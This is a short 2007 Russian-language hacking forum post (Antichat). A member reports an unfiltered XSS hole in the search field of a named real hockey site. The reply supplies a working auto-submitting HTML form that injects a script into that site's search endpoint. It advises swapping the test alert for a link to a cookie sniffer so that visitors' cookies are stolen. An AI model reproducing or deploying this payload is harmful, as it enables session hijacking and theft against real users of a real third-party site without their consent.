17.12.2007, 00:03
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от Spoke
http://allhockey.ru/ на этом сайте в поле поиск есть xss....
фильтра там помойму вообще нет...кто чем помочь может развить идею?)
Дай кому-нить ссылку на хтмл следующего содержания:
Код:
<html>
<head>
<title></title>
</head>
<body onload="document.replier.submit();">
<form action="http://allhockey.ru/find/do-search.query-post.page-0.html" name="replier" id="find" method="post">
<input
type="text"
name="query"
value='"><script>alert(1)</script>' />
</form>
</body>
</html>
Он увидит алерт. За место алерта ввсунь ссылку на снифер.
Зы Если на этом сайте куки вообще используются 
|
|
|